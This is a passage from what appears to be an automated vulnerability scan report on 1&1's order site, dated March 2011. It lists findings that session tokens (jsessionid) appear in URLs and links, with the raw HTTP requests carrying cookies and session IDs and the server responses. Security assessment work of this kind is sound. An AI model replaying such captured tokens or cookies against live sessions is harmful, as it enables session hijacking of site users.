<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?linkType=&amp;linkOrigin=&amp;linkid=hd.tab.packageselection"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.tab.chooseadomain" rel="button-hd-tab-chooseadomain"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">Click here</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=eshopupselling&amp;linkOrigin=eshopupselling&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.110. http://order.1and1.com/xml/order/popupDomainPrices

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupDomainPrices

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/popupDomainPrices;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:48:09 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:02:16 GMT; Path=/
ETag: e45563522176fd4cc17107a164b81314
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20311


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.111. http://order.1and1.com/xml/order/popupDomainPrices

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupDomainPrices

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/popupDomainPrices;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:48:09 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:02:16 GMT; Path=/
ETag: e45563522176fd4cc17107a164b81314
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20311


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=popupDomainPrices&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=popupDomainPrices&amp;page=switch&amp;linkOrigin=popupDomainPrices&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?linkType=&amp;linkOrigin=&amp;linkid=hd.tab.packageselection"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.tab.chooseadomain" rel="button-hd-tab-chooseadomain"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
<br><a rel="blank" class="target" href="/xml/order/TcSpecialOffers;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">Click here</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=popupDomainPrices&amp;linkOrigin=popupDomainPrices&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=popupDomainPrices&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.112. http://order.1and1.com/xml/order/popupGreenPower

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupGreenPower

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/popupGreenPower;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:34:56 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupGreenPower?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.113. http://order.1and1.com/xml/order/popupPayPalInfo

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupPayPalInfo

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/popupPayPalInfo;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:50:23 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupPayPalInfo?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.114. http://order.1and1.com/xml/order/popupServerOsCds

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupServerOsCds

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/popupServerOsCds;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:50:02 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupServerOsCds?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.115. http://order.1and1.com/xml/order/popupServerOsVps

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupServerOsVps

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/popupServerOsVps;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:51:30 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupServerOsVps?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.116. http://order.1and1.com/xml/order/popupTcGoogleAdwords

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupTcGoogleAdwords

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/popupTcGoogleAdwords;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:46:33 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupTcGoogleAdwords?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.117. http://order.1and1.com/xml/order/popupWebsiteMagazine

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupWebsiteMagazine

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/popupWebsiteMagazine;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
